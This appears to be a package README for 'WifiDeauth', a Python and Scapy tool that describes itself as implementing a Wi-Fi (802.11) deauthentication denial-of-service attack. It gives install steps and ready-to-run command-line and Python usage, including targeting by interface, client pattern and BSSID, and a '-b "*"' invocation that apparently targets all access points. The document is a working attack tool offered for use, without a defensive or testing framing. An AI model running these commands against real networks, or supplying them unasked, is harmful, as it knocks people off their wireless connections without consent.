WifiDeauth
Description
This package implement a Dos attack on Wifi (protocol: 802.11) named Deauth.
Requirements
This package require :
- python3
- python3 Standard Library
- Scapy
Installation
pip install WifiDeauth
Examples
Command lines
WifiDeauth -h
WifiDeauth --help
WifiDeauth -vvvvv
WifiDeauth -i "wlan0"
WifiDeauth -t "0A*"
WifiDeauth -b "^([a-fA-F0-9]{2}:?){6}$"
Python3
from WifiDeauth import WifiDeauth
deauth = WifiDeauth(targets="0A*", bssid="^([a-fA-F0-9]{2}:?){6}$", interface="wlan0", debug=5)
deauth.sniff()
Python executable:
python3 -m pip install scapy
python3 WifiDeauth.pyz -vvvvv
python3 -m pip install scapy
chmod u+x WifiDeauth.pyz
./WifiDeauth.pyz -b "*"
Python module (command line):
python3 -m WifiDeauth
python3 -m WifiDeauth.WifiDeauth -i "wlan0"
Links
Licence
Licensed under the GPL, version 3.